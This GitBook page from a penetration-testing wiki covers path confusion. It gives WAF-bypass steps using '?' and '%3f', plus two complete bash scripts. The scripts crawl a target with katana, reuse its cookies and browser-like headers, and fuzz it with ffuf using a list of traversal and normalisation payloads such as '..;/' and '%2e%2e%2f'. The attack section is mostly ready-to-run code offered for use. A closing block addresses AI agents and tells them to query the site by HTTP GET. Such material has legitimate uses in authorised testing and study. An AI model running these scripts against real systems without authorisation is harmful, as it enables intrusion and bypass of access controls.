# Path Confusion ## Check List * [ ] Make sure application paths are configured correctly. ## Methodology #### WAF Bypass Via Path Confustion {% stepper %} {% step %} Log in to the site Send a request with a malicious payload at an entry point {% endstep %} {% step %} Check if the server is blocking you and giving a 403 error {% endstep %} {% step %} If the server returns a 403, send the request using the `?` or `%3f` character\ like the following request like ```hurl https://target.com/search?q=1%3f ``` {% endstep %} {% step %} If the server does not give us a 403 in response and the vulnerability is implemented, it means that the waf bypass has been confirmed {% endstep %} {% endstepper %} *** ## Cheat Sheet ### Dictionary Fuzzer #### [FFUF](https://github.com/ffuf/ffuf) {% hint style="info" %} Create Script {% endhint %} ```bash sudo nano pc-dict-fuzzer.sh ``` ```bash #!/bin/bash if [ "$#" -ne 1 ]; then echo "Usage: $0 " exit 1 fi WEBSITE="$1" # Validate URL format if ! [[ "$WEBSITE" =~ ^https?:// ]]; then echo "Error: WEBSITE must start with http:// or https://" exit 1 fi # Create temporary files URLS_FILE=$(mktemp) COOKIE_FILE=$(mktemp) PAYLOAD_FILE=$(mktemp) # Cleanup function cleanup() { rm -f "$URLS_FILE" "$COOKIE_FILE" "$PAYLOAD_FILE" } trap cleanup EXIT # Define path confusion payloads cat > "$PAYLOAD_FILE" << EOF %2e%2e %2F %2e%2F %2f%2e %2e%2e%2f %2e%2e%2f%2e%2e%2f %2f%2e%2e%2f %2f%2e%2e %252e%252e%252f ..;/ .;/ ../ ..../ ....// /..;/ /../ /..%00/ /./ %3f %5c %252f /%2e%2e/ ;/../ ././ %5c%2e%2e%5c ..;/.. EOF # User-Agent and headers USER_AGENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0" HEADERS=( "User-Agent: $USER_AGENT" "Accept: */*" "Accept-Language: en-US,fa-IR;q=0.5" "Accept-Encoding: gzip, deflate, br, zstd" "Connection: keep-alive" "Upgrade-Insecure-Requests: 1" "Sec-Fetch-Dest: script" "Sec-Fetch-Mode: no-cors" "Sec-Fetch-Site: cross-site" "DNT: 1" "Sec-GPC: 1" "Priority: u=0, i" "Te: trailers" ) # Extract cookies from response headers curl -s -I "$WEBSITE" | awk 'BEGIN {IGNORECASE=1} /^set-cookie:/ {print substr($0, 13)}' > "$COOKIE_FILE" # Process cookies COOKIES=$(awk -F';' '{print $1}' "$COOKIE_FILE" | tr '\n' '; ' | sed 's/; $//') # Append cookies if available if [[ -n "$COOKIES" ]]; then HEADERS+=("Cookie: $COOKIES") fi # Convert headers into ffuf parameters HEADER_PARAMS=() for HEADER in "${HEADERS[@]}"; do HEADER_PARAMS+=("-H" "$HEADER") done # Run ffuf ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt:DIR \ -w "$PAYLOAD_FILE":PAYLOAD \ -u "$WEBSITE/DIR/PAYLOAD" \ -ac -c -v -mc 200 \ "${HEADER_PARAMS[@]}" ``` {% hint style="info" %} Run Script {% endhint %} ```bash sudo chmod +x pc-dict-fuzzer.sh;sudo ./pc-dict-fuzzer.sh $WEBSITE ``` ### Crawl Fuzzer #### [FFUF ](https://github.com/ffuf/ffuf)& [Katana](https://github.com/projectdiscovery/katana) {% hint style="info" %} Create Script {% endhint %} ```bash sudo nano pc-crawl-fuzzer.sh ``` ```bash #!/bin/bash if [ "$#" -ne 1 ]; then echo "Usage: $0 " exit 1 fi WEBSITE="$1" # Validate URL format if ! [[ "$WEBSITE" =~ ^https?:// ]]; then echo "Error: WEBSITE must start with http:// or https://" exit 1 fi # Create temporary files KATANA_OUTPUT=$(mktemp) URLS_FILE=$(mktemp) COOKIE_FILE=$(mktemp) PAYLOAD_FILE=$(mktemp) # Cleanup function cleanup() { rm -f "$KATANA_OUTPUT" "$URLS_FILE" "$COOKIE_FILE" "$PAYLOAD_FILE" } trap cleanup EXIT # Run katana to gather URLs katana -u $WEBSITE \ -fr "(static|assets|img|images|css|fonts|icons)/" \ -o "$KATANA_OUTPUT" \ -xhr-extraction \ -automatic-form-fill \ -silent \ -strategy breadth-first \ -js-crawl \ -extension-filter jpg,jpeg,png,gif,bmp,tiff,tif,webp,svg,ico,css \ -headless --no-sandbox \ -known-files all \ -field url \ -sf url # Filter and clean extracted URLs grep -Ev '\.js$|&' "$KATANA_OUTPUT" | sort -u > "$URLS_FILE" # Define path confusion payloads cat > $PAYLOAD_FILE << EOF %2e%2e %2F %2e%2F %2f%2e %2e%2e%2f %2e%2e%2f%2e%2e%2f %2f%2e%2e%2f %2f%2e%2e %252e%252e%252f ..;/ .;/ ../ ..../ ....// /..;/ /../ /..%00/ /./ %3f %5c %252f /%2e%2e/ ;/../ ././ %5c%2e%2e%5c ..;/.. EOF # User-Agent and headers USER_AGENT="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0" HEADERS=( "User-Agent: $USER_AGENT" "Accept: */*" "Accept-Language: en-US,fa-IR;q=0.5" "Accept-Encoding: gzip, deflate, br, zstd" "Connection: keep-alive" "Upgrade-Insecure-Requests: 1" "Sec-Fetch-Dest: script" "Sec-Fetch-Mode: no-cors" "Sec-Fetch-Site: cross-site" "DNT: 1" "Sec-GPC: 1" "Priority: u=0, i" "Te: trailers" ) # Extract cookies from response headers curl -s -I "$WEBSITE" | awk 'BEGIN {IGNORECASE=1} /^set-cookie:/ {print substr($0, 13)}' > "$COOKIE_FILE" # Process cookies COOKIES=$(awk -F';' '{print $1}' "$COOKIE_FILE" | tr '\n' '; ' | sed 's/; $//') # Append cookies if available if [[ -n "$COOKIES" ]]; then HEADERS+=("Cookie: $COOKIES") fi # Convert headers into ffuf parameters HEADER_PARAMS=() for HEADER in "${HEADERS[@]}"; do HEADER_PARAMS+=("-H" "$HEADER") done # Run ffuf ffuf -w $URLS_FILE:URL \ -w $PAYLOAD_FILE:PAYLOAD \ -u URL/PAYLOAD \ -ac -c -v -mc 200 \ "${HEADER_PARAMS[@]}" ``` {% hint style="info" %} Run Script {% endhint %} ```bash sudo chmod +x pc-crawl-fuzzer.sh;sudo ./pc-crawl-fuzzer.sh $WEBSITE ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://unk9vvn.gitbook.io/penetration-testing/web/misconfiguration/path-confusion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.